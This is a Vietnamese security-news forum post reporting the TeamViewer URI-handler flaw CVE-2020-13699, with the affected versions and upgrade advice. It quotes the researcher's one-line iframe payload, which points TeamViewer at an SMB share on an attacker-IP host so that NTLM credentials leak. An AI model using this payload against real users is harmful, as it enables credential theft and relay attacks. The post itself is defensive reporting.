TeamViewer có thể bị khai thác để crack password người dùng

Thảo luận trong 'Tin tức An ninh mạng' bắt đầu bởi Thriuenug, 10/08/20, 07:08 PM.

  1. Thriuenug

    Thriuenug Moderator Thành viên BQT

    Tham gia: 29/08/19, 03:08 AM
    Bài viết: 31
    Đã được thích: 15
    Điểm thành tích:
    8
    Một lỗ hổng nghiêm trọng (CVE-2020-13699) trong TeamViewer trên Windows có thể bị tấn công từ xa để crack password người dùng, thậm chí dẫn đến việc khai thác hệ thống.

    teamviewer-logo.jpg
    Giới thiệu về TeamViewer
    TeamViewer là một ứng dụng được phát triển bởi công ty TeamViewGmbH của Đức và hỗ trợ các hệ điều hành Windows, macOS, Linux, Chrome OS, iOS, Android, Windows RT Windows Phone 8 và BlackBerry.
    TeamViewer được sử dụng chủ yếu để truy cập từ xa và điều khiển các loại hệ thống máy tính và thiết bị di động, đồng thời cũng cung cấp các tính năng liên kết và tác vụ trình chiếu (ví dụ: chia sẻ máy tính, hội nghị trực tuyến, truyền tệp, v.v.)
    Kể từ khi COVID-19 diễn ra, việc sử dụng phần mềm này của các doanh nghiệp đã tăng lên đáng kể do nhiều nhân viên bị buộc phải làm việc tại nhà.

    Thông tin về lỗ hổng bảo mật (CVE-2020-13699)

    CVE-2020-13699 là lỗ hổng bảo mật phát sinh từ một phần tử hoặc đường dẫn tìm kiếm không được trích dẫn - cụ thể hơn, đó là do ứng dụng không trích dẫn chính xác các trình xử lý URI tùy chỉnh - và hệ thống có cài phiên bản TeamViewer bảo mật kém có thể bị khai thác khi truy cập các trang web độc hại.
    “Kẻ tấn công có thể nhúng iframe vào một trang web có URL được tạo thủ công (iframe src = 'teamviewer10: --play \\ attacker-IP \ share \ fake.tvs'). Lệnh này sẽ khởi chạy ứng dụng TeamViewer trên máy tính sử dụng hệ điều hành Windows và buộc máy tính mở giao thức chia sẻ từ xa SMB”, kỹ sư Jeffrey Hofmann của công ty bảo mật mạng Praetorian đã phát hiện lỗ hổng lên tiếng cảnh báo.
    “Windows sẽ thực hiện xác thực NTLM khi mở giao thức chia sẻ SMB và yêu cầu xác thực đó có thể được chuyển tiếp (qua việc sử dụng một công cụ phản hồi) để thực thi mã (hoặc giữ lại để bẻ khóa hàm băm)”.
    Như đã chia sẻ ở trên, việc khai thác lỗ hổng có thể được thực hiện từ xa và không yêu cầu xác thực. Lỗ hổng này có thể bị tận dụng cho các cuộc tấn công watering hole attacks.
    Chưa có dấu hiệu nào cho thấy lỗ hổng này đang được khai thác rộng rãi hay được dùng trong những cuộc tấn công mạng quy mô lớn.
    CIS đánh giá rằng lỗ hổng này ở mức độ nguy hiểm cao đối với các tổ chức chính phủ và doanh nghiệp vừa và lớn, mức độ trung bình đối với các tổ chức chính phủ và doanh nghiệp nhỏ và mức độ thấp đối với người dùng cá nhân.
    Theo công ty Praetorian, lỗ hổng này xuất hiện trên các phiên bản TeamViewer từ 8 đến 15 (lên đến 15.8.2) cho nền tảng Windows. Người dùng nên nâng cấp lên phiên bản 15.8.3 trở lên để đảm bảo an toàn cho hệ thống của mình.
     
    Last edited by a moderator: 11/08/20, 11:08 AM
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
    lapduc and linh24 like this.